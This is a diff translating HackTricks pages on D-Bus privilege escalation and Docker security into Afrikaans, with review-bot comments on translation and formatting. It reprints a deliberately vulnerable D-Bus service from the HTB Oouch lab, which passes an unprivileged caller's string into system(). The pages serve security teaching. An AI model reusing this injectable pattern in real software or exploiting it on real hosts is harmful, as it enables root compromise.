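Review bot: three new paragraphs were added under `#### busctl en dbus-send` ("`busctl` is a command-line tool used to interact with the D-Bus system bus…", "`dbus-send` is another command-line tool…", "Both `busctl` and `dbus-send` are powerful tools…") that exist in neither the English original nor in Afrikaans. A translation patch should not introduce new content, and if the paragraphs are kept they need to be translated like the rest of the page. Also in this hunk, the bullet list writes the flags as "–system", "–print-reply" and "–dest=" with an en dash, whereas the `dbus-send` command just above uses `--system --print-reply --dest=`; the original's single-dash "-system" was already wrong, so this is a good moment to write them in backticks as `--system`, `--print-reply` and `--dest`. Finally, the italic markers around the closing note ("_Note that in `htb.oouch.Block.Block`…_") were dropped in "Merk op dat in `htb.oouch.Block.Block`…"; keep the emphasis consistent with the source.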
@@ -351,148 +327,148 @@ _Note that in `htb.oouch.Block.Block`, the first part (`htb.oouch.Block`) refere #include static int method_block(sd_bus_message *m, void *userdata, sd_bus_error *ret_error) { - char* host = NULL; - int r; +char* host = NULL; +int r; - /* Read the parameters */ - r = sd_bus_message_read(m, "s", &host); - if (r < 0) { - fprintf(stderr, "Failed to obtain hostname: %s\n", strerror(-r)); - return r; - } +/* Read the parameters */ +r = sd_bus_message_read(m, "s", &host); +if (r < 0) { +fprintf(stderr, "Failed to obtain hostname: %s\n", strerror(-r)); +return r; +} - char command[] = "iptables -A PREROUTING -s %s -t mangle -j DROP"; +char command[] = "iptables -A PREROUTING -s %s -t mangle -j DROP"; - int command_len = strlen(command); - int host_len = strlen(host); +int command_len = strlen(command); +int host_len = strlen(host); - char* command_buffer = (char *)malloc((host_len + command_len) * sizeof(char)); - if(command_buffer == NULL) { - fprintf(stderr, "Failed to allocate memory\n"); - return -1; - } +char* command_buffer = (char *)malloc((host_len + command_len) * sizeof(char)); +if(command_buffer == NULL) { +fprintf(stderr, "Failed to allocate memory\n"); +return -1; +} - sprintf(command_buffer, command, host); +sprintf(command_buffer, command, host); - /* In the first implementation, we simply ran command using system(), since the expected DBus - * to be threading automatically. However, DBus does not thread and the application will hang - * forever if some user spawns a shell. Thefore we need to fork (easier than implementing real - * multithreading) - */ - int pid = fork(); +/* In the first implementation, we simply ran command using system(), since the expected DBus +* to be threading automatically. However, DBus does not thread and the application will hang +* forever if some user spawns a shell. 
Thefore we need to fork (easier than implementing real +* multithreading) +*/ +int pid = fork(); - if ( pid == 0 ) { - /* Here we are in the child process. We execute the command and eventually exit. */ - system(command_buffer); - exit(0); - } else { - /* Here we are in the parent process or an error occured. We simply send a genric message. - * In the first implementation we returned separate error messages for success or failure. - * However, now we cannot wait for results of the system call. Therefore we simply return - * a generic. */ - return sd_bus_reply_method_return(m, "s", "Carried out :D"); - } - r = system(command_buffer); +if ( pid == 0 ) { +/* Here we are in the child process. We execute the command and eventually exit. */ +system(command_buffer); +exit(0); +} else { +/* Here we are in the parent process or an error occured. We simply send a genric message. +* In the first implementation we returned separate error messages for success or failure. +* However, now we cannot wait for results of the system call. Therefore we simply return +* a generic. */ +return sd_bus_reply_method_return(m, "s", "Carried out :D"); +} +r = system(command_buffer); } /* The vtable of our little object, implements the net.poettering.Calculator interface */ static const sd_bus_vtable block_vtable[] = { - SD_BUS_VTABLE_START(0), - SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED), - SD_BUS_VTABLE_END +SD_BUS_VTABLE_START(0), +SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED), +SD_BUS_VTABLE_END }; int main(int argc, char *argv[]) { - /* - * Main method, registeres the htb.oouch.Block service on the system dbus. - * - * Paramaters: - * argc (int) Number of arguments, not required - * argv[] (char**) Argument array, not required - * - * Returns: - * Either EXIT_SUCCESS ot EXIT_FAILURE. Howeverm ideally it stays alive - * as long as the user keeps it alive. 
- */ +/* +* Main method, registeres the htb.oouch.Block service on the system dbus. +* +* Paramaters: +* argc (int) Number of arguments, not required +* argv[] (char**) Argument array, not required +* +* Returns: +* Either EXIT_SUCCESS ot EXIT_FAILURE. Howeverm ideally it stays alive +* as long as the user keeps it alive. +*/ - /* To prevent a huge numer of defunc process inside the tasklist, we simply ignore client signals */ - signal(SIGCHLD,SIG_IGN); +/* To prevent a huge numer of defunc process inside the tasklist, we simply ignore client signals */ +signal(SIGCHLD,SIG_IGN); - sd_bus_slot *slot = NULL; - sd_bus *bus = NULL; - int r; +sd_bus_slot *slot = NULL; +sd_bus *bus = NULL; +int r; - /* First we need to connect to the system bus. */ - r = sd_bus_open_system(&bus); - if (r < 0) - { - fprintf(stderr, "Failed to connect to system bus: %s\n", strerror(-r)); - goto finish; - } +/* First we need to connect to the system bus. */ +r = sd_bus_open_system(&bus); +if (r < 0) +{ +fprintf(stderr, "Failed to connect to system bus: %s\n", strerror(-r)); +goto finish; +} - /* Install the object */ - r = sd_bus_add_object_vtable(bus, - &slot, - "/htb/oouch/Block", /* interface */ - "htb.oouch.Block", /* service object */ - block_vtable, - NULL); - if (r < 0) { - fprintf(stderr, "Failed to install htb.oouch.Block: %s\n", strerror(-r)); - goto finish; - } +/* Install the object */ +r = sd_bus_add_object_vtable(bus, +&slot, +"/htb/oouch/Block", /* interface */ +"htb.oouch.Block", /* service object */ +block_vtable, +NULL); +if (r < 0) { +fprintf(stderr, "Failed to install htb.oouch.Block: %s\n", strerror(-r)); +goto finish; +} - /* Register the service name to find out object */ - r = sd_bus_request_name(bus, "htb.oouch.Block", 0); - if (r < 0) { - fprintf(stderr, "Failed to acquire service name: %s\n", strerror(-r)); - goto finish; - } +/* Register the service name to find out object */ +r = sd_bus_request_name(bus, "htb.oouch.Block", 0); +if (r < 0) { +fprintf(stderr, 
"Failed to acquire service name: %s\n", strerror(-r)); +goto finish; +} - /* Infinite loop to process the client requests */ - for (;;) { - /* Process requests */ - r = sd_bus_process(bus, NULL); - if (r < 0) { - fprintf(stderr, "Failed to process bus: %s\n", strerror(-r)); - goto finish; - } - if (r > 0) /* we processed a request, try to process another one, right-away */ - continue; +/* Infinite loop to process the client requests */ +for (;;) { +/* Process requests */ +r = sd_bus_process(bus, NULL); +if (r < 0) { +fprintf(stderr, "Failed to process bus: %s\n", strerror(-r)); +goto finish; +} +if (r > 0) /* we processed a request, try to process another one, right-away */ +continue; - /* Wait for the next request to process */ - r = sd_bus_wait(bus, (uint64_t) -1); - if (r < 0) { - fprintf(stderr, "Failed to wait on bus: %s\n", strerror(-r)); - goto finish; - } - } +/* Wait for the next request to process */ +r = sd_bus_wait(bus, (uint64_t) -1); +if (r < 0) { +fprintf(stderr, "Failed to wait on bus: %s\n", strerror(-r)); +goto finish; +} +} finish: - sd_bus_slot_unref(slot); - sd_bus_unref(bus); +sd_bus_slot_unref(slot); +sd_bus_unref(bus); - return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS; +return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS; } ``` {% endcode %} -## References +## Verwysings * [https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
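Review bot: the entire `d-bus_server.c` listing inside `{% code title="d-bus_server.c" %}` was rewritten only to strip leading indentation (for example `- char* host = NULL;` became `+char* host = NULL;`, and the same for every line through `+return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS;`), a 148-line whitespace-only change that makes the server code harder to read and hides any real edits in the review. Nothing in this block is translatable, so it should be left byte-identical to the source; please revert the reindentation and keep only the heading change `## References` to `## Verwysings`.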
diff --git a/linux-hardening/privilege-escalation/docker-security/README.md b/linux-hardening/privilege-escalation/docker-security/README.md index 4776281a1..5ec2d3a87 100644 --- a/linux-hardening/privilege-escalation/docker-security/README.md +++ b/linux-hardening/privilege-escalation/docker-security/README.md @@ -1,68 +1,65 @@ -# Docker Security +# Docker Sekuriteit
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## **Basic Docker Engine Security** +## **Basiese Docker Engine Sekuriteit** -The **Docker engine** employs the Linux kernel's **Namespaces** and **Cgroups** to isolate containers, offering a basic layer of security. Additional protection is provided through **Capabilities dropping**, **Seccomp**, and **SELinux/AppArmor**, enhancing container isolation. An **auth plugin** can further restrict user actions. +Die **Docker-engine** maak gebruik van die Linux-kernel se **Namespaces** en **Cgroups** om houers te isoleer en bied 'n basiese vlak van sekuriteit. Addisionele beskerming word gebied deur **Capabilities dropping**, **Seccomp**, en **SELinux/AppArmor**, wat houer-isolasie verbeter. 'n **Auth plugin** kan verdere beperkings plaas op gebruikersaksies. -![Docker Security](https://sreeninet.files.wordpress.com/2016/03/dockersec1.png) +![Docker Sekuriteit](https://sreeninet.files.wordpress.com/2016/03/dockersec1.png) -### Secure Access to Docker Engine +### Veilige Toegang tot Docker Engine -The Docker engine can be accessed either locally via a Unix socket or remotely using HTTP. For remote access, it's essential to employ HTTPS and **TLS** to ensure confidentiality, integrity, and authentication. - -The Docker engine, by default, listens on the Unix socket at `unix:///var/run/docker.sock`. On Ubuntu systems, Docker's startup options are defined in `/etc/default/docker`. 
To enable remote access to the Docker API and client, expose the Docker daemon over an HTTP socket by adding the following settings: +Die Docker-engine kan plaaslik benader word deur 'n Unix-aansluiting of op afstand deur middel van HTTP. Vir afstandsbenadering is dit noodsaaklik om HTTPS en **TLS** te gebruik om vertroulikheid, integriteit en outentisiteit te verseker. +Die Docker-engine luister standaard na die Unix-aansluiting by `unix:///var/run/docker.sock`. Op Ubuntu-stelsels word Docker se opstartopsies gedefinieer in `/etc/default/docker`. Om afstandsbenadering tot die Docker API en klient moontlik te maak, stel die Docker-daemon bloot oor 'n HTTP-aansluiting deur die volgende instellings by te voeg: ```bash DOCKER_OPTS="-D -H unix:///var/run/docker.sock -H tcp://192.168.56.101:2376" sudo service docker restart ``` +Nietemin, dit word nie aanbeveel om die Docker daemon oor HTTP bloot te stel nie as gevolg van sekuriteitskwessies. Dit is raadsaam om verbinding te beveilig deur gebruik te maak van HTTPS. Daar is twee hoofbenaderings om die verbinding te beveilig: +1. Die klient verifieer die identiteit van die bediener. +2. Beide die klient en bediener verifieer mekaar se identiteit. -However, exposing the Docker daemon over HTTP is not recommended due to security concerns. It's advisable to secure connections using HTTPS. There are two main approaches to securing the connection: -1. The client verifies the server's identity. -2. Both the client and server mutually authenticate each other's identity. +Sertifikate word gebruik om die identiteit van 'n bediener te bevestig. Vir gedetailleerde voorbeelde van beide metodes, verwys na [**hierdie gids**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-3engine-access/). -Certificates are utilized to confirm a server's identity. For detailed examples of both methods, refer to [**this guide**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-3engine-access/). 
+### Sekuriteit van Houderverspreidings -### Security of Container Images +Houderverspreidings kan in private of openbare verspreidingsbewaarplekke gestoor word. Docker bied verskeie stooropsies vir houderverspreidings: -Container images can be stored in either private or public repositories. Docker offers several storage options for container images: +* **[Docker Hub](https://hub.docker.com)**: 'n Openbare registerdiens van Docker. +* **[Docker Registry](https://github.com/docker/distribution)**: 'n Opensourceprojek wat gebruikers in staat stel om hul eie register te bedryf. +* **[Docker Trusted Registry](https://www.docker.com/docker-trusted-registry)**: Docker se kommersiële registerdiens wat rolgebaseerde gebruikersverifikasie en integrasie met LDAP-gidsdienste bied. -* **[Docker Hub](https://hub.docker.com)**: A public registry service from Docker. -* **[Docker Registry](https://github.com/docker/distribution)**: An open-source project allowing users to host their own registry. -* **[Docker Trusted Registry](https://www.docker.com/docker-trusted-registry)**: Docker's commercial registry offering, featuring role-based user authentication and integration with LDAP directory services. +### Beeldskandering -### Image Scanning +Houers kan **sekuriteitskwessies** hê as gevolg van die basisbeeld of as gevolg van die sagteware wat bo-op die basisbeeld geïnstalleer is. Docker werk aan 'n projek genaamd **Nautilus** wat sekuriteitskandering van Houers doen en die kwessies lys. Nautilus werk deur elke Houerbeeldlaag te vergelyk met 'n kwessierepositorium om sekuriteitslekke te identifiseer. -Containers can have **security vulnerabilities** either because of the base image or because of the software installed on top of the base image. Docker is working on a project called **Nautilus** that does security scan of Containers and lists the vulnerabilities. Nautilus works by comparing the each Container image layer with vulnerability repository to identify security holes. 
- -For more [**information read this**](https://docs.docker.com/engine/scan/). +Vir meer [**inligting lees hierdie**](https://docs.docker.com/engine/scan/). * **`docker scan`** -The **`docker scan`** command allows you to scan existing Docker images using the image name or ID. For example, run the following command to scan the hello-world image: - +Die **`docker scan`** opdrag stel jou in staat om bestaande Docker-beelde te skandeer deur die beeldnaam of ID te gebruik. Voer byvoorbeeld die volgende opdrag uit om die hello-world beeld te skandeer: ```bash docker scan hello-world 
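Review bot: the heading `+### Sekuriteit van Houderverspreidings` and the sentence under it mistranslate "Container images" as `Houderverspreidings` (container distributions), while the same hunk renders the same term as `beelde` in the registry bullets, `Beeldskandering` for the next heading and `Houerbeeldlaag` in the Nautilus paragraph; pick one term (for example `houerbeelde`) and use it in all four places, and fix the `Houder`/`Houer` spelling while at it. The hunk also removes the blank lines that separated prose from the bash code fences in the source (before the `DOCKER_OPTS` block and before `docker scan hello-world`), which is an unrelated whitespace change for a translation commit and explains most of the `-68 +65` line count; keep those blank lines so the fences render exactly as in the English file. Minor: the Twitter bullet keeps `@carlospolopm` pointing at `https://twitter.com/hacktricks_live`, as the source does, whereas the banner translated just before this file uses `@hacktricks_live`; worth aligning in a follow-up rather than here.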
@@ -78,78 +75,68 @@ Licenses: enabled Note that we do not currently have vulnerability data for your image. ``` - * [**`trivy`**](https://github.com/aquasecurity/trivy) - ```bash trivy -q -f json : ``` - * [**`snyk`**](https://docs.snyk.io/snyk-cli/getting-started-with-the-cli) - ```bash snyk container test --json-file-output= --severity-threshold=high ``` - * [**`clair-scanner`**](https://github.com/arminc/clair-scanner) - ```bash clair-scanner -w example-alpine.yaml --ip YOUR_LOCAL_IP alpine:3.5 ``` +### Docker Beeldondertekening -### Docker Image Signing +Docker beeldondertekening verseker die veiligheid en integriteit van beelde wat in houers gebruik word. Hier is 'n beknopte verduideliking: -Docker image signing ensures the security and integrity of images used in containers. Here's a condensed explanation: - -- **Docker Content Trust** utilizes the Notary project, based on The Update Framework (TUF), to manage image signing. For more info, see [Notary](https://github.com/docker/notary) and [TUF](https://theupdateframework.github.io). -- To activate Docker content trust, set `export DOCKER_CONTENT_TRUST=1`. This feature is off by default in Docker version 1.10 and later. -- With this feature enabled, only signed images can be downloaded. Initial image push requires setting passphrases for the root and tagging keys, with Docker also supporting Yubikey for enhanced security. More details can be found [here](https://blog.docker.com/2015/11/docker-content-trust-yubikey/). -- Attempting to pull an unsigned image with content trust enabled results in a "No trust data for latest" error. -- For image pushes after the first, Docker asks for the repository key's passphrase to sign the image. - -To back up your private keys, use the command: +- **Docker Inhoudsvertroue** maak gebruik van die Notary-projek, gebaseer op The Update Framework (TUF), om beeldondertekening te bestuur. 
Vir meer inligting, sien [Notary](https://github.com/docker/notary) en [TUF](https://theupdateframework.github.io). +- Om Docker inhoudsvertroue te aktiveer, stel `export DOCKER_CONTENT_TRUST=1` in. Hierdie funksie is standaard af in Docker weergawe 1.10 en later. +- Met hierdie funksie geaktiveer, kan slegs ondertekende beelde afgelaai word. Die aanvanklike beeldstoot vereis die instelling van wagwoorde vir die hoof- en etiketteringssleutels, terwyl Docker ook Yubikey ondersteun vir verbeterde veiligheid. Meer besonderhede kan [hier](https://blog.docker.com/2015/11/docker-content-trust-yubikey/) gevind word. +- As jy probeer om 'n ondertekende beeld met inhoudsvertroue geaktiveer af te trek, sal jy 'n "Geen vertroue data vir latest" fout kry. +- Vir beeldstote na die eerste, vra Docker vir die wagwoord van die stoor sleutel om die beeld te onderteken. +Om jou privaat sleutels te rugsteun, gebruik die opdrag: ```bash tar -zcvf private_keys_backup.tar.gz ~/.docker/trust/private ``` - -When switching Docker hosts, it's necessary to move the root and repository keys to maintain operations. - +Wanneer jy oorskakel na Docker-gashere, is dit nodig om die root- en bewaarpleksleutels te skuif om werksaamhede te behou. ***
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou wat aangedryf word deur die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Containers Security Features +## Kontainer Sekuriteitskenmerke
-Summary of Container Security Features +Oorsig van Kontainer Sekuriteitskenmerke -### Main Process Isolation Features +### Hoofproses Isolasiekenmerke -In containerized environments, isolating projects and their processes is paramount for security and resource management. Here's a simplified explanation of key concepts: +In gekontainerde omgewings is die isolasie van projekte en hul prosesse van uiterste belang vir sekuriteit en hulpbronbestuur. Hier is 'n vereenvoudigde verduideliking van sleutelkonsepte: #### **Namespaces** -- **Purpose**: Ensure isolation of resources like processes, network, and filesystems. Particularly in Docker, namespaces keep a container's processes separate from the host and other containers. -- **Usage of `unshare`**: The `unshare` command (or the underlying syscall) is utilized to create new namespaces, providing an added layer of isolation. However, while Kubernetes doesn't inherently block this, Docker does. -- **Limitation**: Creating new namespaces doesn't allow a process to revert to the host's default namespaces. To penetrate the host namespaces, one would typically require access to the host's `/proc` directory, using `nsenter` for entry. +- **Doel**: Verseker isolasie van hulpbronne soos prosesse, netwerk en lêersisteme. Veral in Docker hou namespaces 'n kontainer se prosesse geskei van die gasheer en ander kontainers. +- **Gebruik van `unshare`**: Die `unshare`-opdrag (of die onderliggende stelseloproep) word gebruik om nuwe namespaces te skep, wat 'n bygevoegde laag van isolasie bied. Alhoewel Kubernetes dit nie inherent blokkeer nie, doen Docker dit wel. +- **Beperking**: Die skep van nuwe namespaces laat nie toe dat 'n proses terugkeer na die gasheer se verstek-namespaces nie. Om toegang tot die gasheer-namespaces te verkry, sal 'n persoon tipies toegang tot die gasheer se `/proc`-gids benodig en `nsenter` gebruik om in te gaan. 
-#### **Control Groups (CGroups)** -- **Function**: Primarily used for allocating resources among processes. -- **Security Aspect**: CGroups themselves don't offer isolation security, except for the `release_agent` feature, which, if misconfigured, could potentially be exploited for unauthorized access. +#### **Beheergroepe (CGroups)** +- **Funksie**: Primêr gebruik vir die toekenning van hulpbronne aan prosesse. +- **Sekuriteitsaspek**: CGroups self bied nie isolasie-sekuriteit nie, behalwe vir die `release_agent`-kenmerk wat, as dit verkeerd gekonfigureer is, potensieel uitgebuit kan word vir ongemagtigde toegang. -#### **Capability Drop** -- **Importance**: It's a crucial security feature for process isolation. -- **Functionality**: It restricts the actions a root process can perform by dropping certain capabilities. Even if a process runs with root privileges, lacking the necessary capabilities prevents it from executing privileged actions, as the syscalls will fail due to insufficient permissions. +#### **Bevoegdheid Laat Vaar** +- **Belangrikheid**: Dit is 'n belangrike sekuriteitskenmerk vir prosesisolasie. +- **Funksionaliteit**: Dit beperk die aksies wat 'n rootproses kan uitvoer deur sekere bevoegdhede te laat vaar. Selfs as 'n proses met root-voorregte loop, sal dit nie bevoorregte aksies kan uitvoer nie, aangesien die stelseloproepe weens onvoldoende toestemmings sal misluk. -These are the **remaining capabilities** after the process drop the others: +Dit is die **oorblywende bevoegdhede** nadat die proses die ander laat vaar: {% code overflow="wrap" %} ``` 
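Review bot: the bullet `+- As jy probeer om 'n ondertekende beeld met inhoudsvertroue geaktiveer af te trek, sal jy 'n "Geen vertroue data vir latest" fout kry.` inverts the source line `Attempting to pull an unsigned image with content trust enabled`: `ondertekende` means signed, so it must read `'n onondertekende beeld`. The same bullet translates the literal daemon error `"No trust data for latest"` into Afrikaans; error strings readers will search for should stay verbatim, and the feature name `Docker Content Trust` (rendered as `Docker Inhoudsvertroue`) is better left as a proper noun. In `+#### Bevoegdheid Laat Vaar`, the sentence `Selfs as 'n proses met root-voorregte loop, sal dit nie bevoorregte aksies kan uitvoer nie` drops the source's condition `lacking the necessary capabilities`, so it now claims root can never perform privileged actions; add `sonder die nodige bevoegdhede`. The blank lines between the `trivy`, `snyk` and `clair-scanner` bullets and their fences are also removed, as in the previous hunk.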
@@ -159,30 +146,30 @@ Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,ca **Seccomp** -It's enabled by default in Docker. It helps to **limit even more the syscalls** that the process can call.\ -The **default Docker Seccomp profile** can be found in [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json) +Dit is standaard geaktiveer in Docker. Dit help om die syscalls wat die proses kan aanroep, nog meer te beperk.\ +Die standaard Docker Seccomp profiel kan gevind word by [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json) **AppArmor** -Docker has a template that you can activate: [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor) +Docker het 'n sjabloon wat jy kan aktiveer: [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor) -This will allow to reduce capabilities, syscalls, access to files and folders... +Dit sal toelaat om funksies, syscalls, toegang tot lêers en vouers te verminder...
### Namespaces -**Namespaces** are a feature of the Linux kernel that **partitions kernel resources** such that one set of **processes** **sees** one set of **resources** while **another** set of **processes** sees a **different** set of resources. The feature works by having the same namespace for a set of resources and processes, but those namespaces refer to distinct resources. Resources may exist in multiple spaces. +**Namespaces** is 'n kenmerk van die Linux-kernel wat die kernelbronne verdeel sodat een stel **prosesse** een stel **bronne sien**, terwyl 'n **ander** stel **prosesse** 'n **verskillende** stel bronne sien. Die kenmerk werk deur dieselfde namespace vir 'n stel bronne en prosesse te hê, maar daardie namespaces verwys na afsonderlike bronne. Bronne kan in meerdere ruimtes bestaan. -Docker makes use of the following Linux kernel Namespaces to achieve Container isolation: +Docker maak gebruik van die volgende Linux-kernel Namespaces om kontainer-isolasie te bereik: -* pid namespace -* mount namespace -* network namespace -* ipc namespace -* UTS namespace +* pid-namespace +* mount-namespace +* netwerk-namespace +* ipc-namespace +* UTS-namespace -For **more information about the namespaces** check the following page: +Vir **meer inligting oor die namespaces**, kyk na die volgende bladsy: {% content-ref url="namespaces/" %} [namespaces](namespaces/) 
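Review bot: in the AppArmor line `+Dit sal toelaat om funksies, syscalls, toegang tot lêers en vouers te verminder...` the source word `capabilities` is rendered as `funksies` (functions), while the rest of the file uses `bevoegdhede` (`#### Bevoegdheid Laat Vaar`, `### Bevoegdhede`); use `bevoegdhede` here so the reader connects it to the capabilities section. The two Seccomp lines also drop the bold the source puts on `limit even more the syscalls` and `default Docker Seccomp profile`; keep the markdown emphasis in the translation.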
@@ -190,32 +177,28 @@ For **more information about the namespaces** check the following page: ### cgroups -Linux kernel feature **cgroups** provides capability to **restrict resources like cpu, memory, io, network bandwidth among** a set of processes. Docker allows to create Containers using cgroup feature which allows for resource control for the specific Container.\ -Following is a Container created with user space memory limited to 500m, kernel memory limited to 50m, cpu share to 512, blkioweight to 400. CPU share is a ratio that controls Container’s CPU usage. It has a default value of 1024 and range between 0 and 1024. If three Containers have the same CPU share of 1024, each Container can take upto 33% of CPU in case of CPU resource contention. blkio-weight is a ratio that controls Container’s IO. It has a default value of 500 and range between 10 and 1000. - +Die Linux-kernelkenmerk **cgroups** bied die vermoë om hulpbronne soos CPU, geheue, IO, netwerkbandwydte te beperk vir 'n stel prosesse. Docker maak dit moontlik om Kontainers te skep met behulp van die cgroup-funksie wat hulpbronbeheer vir die spesifieke Kontainer moontlik maak.\ +Hieronder is 'n Kontainer wat geskep is met gebruikersruimte-geheue beperk tot 500m, kernelgeheue beperk tot 50m, CPU-aandeel tot 512, blkioweight tot 400. CPU-aandeel is 'n verhouding wat Kontainer se CPU-gebruik beheer. Dit het 'n verstekwaarde van 1024 en 'n reeks tussen 0 en 1024. As drie Kontainers dieselfde CPU-aandeel van 1024 het, kan elke Kontainer tot 33% van die CPU neem in geval van CPU-hulpbronkonflik. blkio-weight is 'n verhouding wat Kontainer se IO beheer. Dit het 'n verstekwaarde van 500 en 'n reeks tussen 10 en 1000. 
``` docker run -it -m 500M --kernel-memory 50M --cpu-shares 512 --blkio-weight 400 --name ubuntu1 ubuntu bash ``` - -To get the cgroup of a container you can do: - +Om die cgroup van 'n houer te kry, kan jy die volgende doen: ```bash docker run -dt --rm denial sleep 1234 #Run a large sleep inside a Debian container ps -ef | grep 1234 #Get info about the sleep process ls -l /proc//ns #Get the Group and the namespaces (some may be uniq to the hosts and some may be shred with it) ``` - -For more information check: +Vir meer inligting, kyk na: {% content-ref url="cgroups.md" %} [cgroups.md](cgroups.md) {% endcontent-ref %} -### Capabilities +### Bevoegdhede -Capabilities allow **finer control for the capabilities that can be allowed** for root user. Docker uses the Linux kernel capability feature to **limit the operations that can be done inside a Container** irrespective of the type of user. +Bevoegdhede maak dit moontlik om **fyn beheer oor die bevoegdhede wat toegelaat kan word** vir die root-gebruiker te hê. Docker maak gebruik van die Linux-kernel se bevoegdheidseienskapfunksie om **die operasies wat binne 'n houer gedoen kan word te beperk**, ongeag die tipe gebruiker. -When a docker container is run, the **process drops sensitive capabilities that the proccess could use to escape from the isolation**. This try to assure that the proccess won't be able to perform sensitive actions and escape: +Wanneer 'n Docker-houer uitgevoer word, **verloor die proses sensitiewe bevoegdhede wat die proses kan gebruik om uit die isolasie te ontsnap**. Dit probeer verseker dat die proses nie sensitiewe aksies kan uitvoer en ontsnap nie: {% content-ref url="../linux-capabilities.md" %} [linux-capabilities.md](../linux-capabilities.md) 
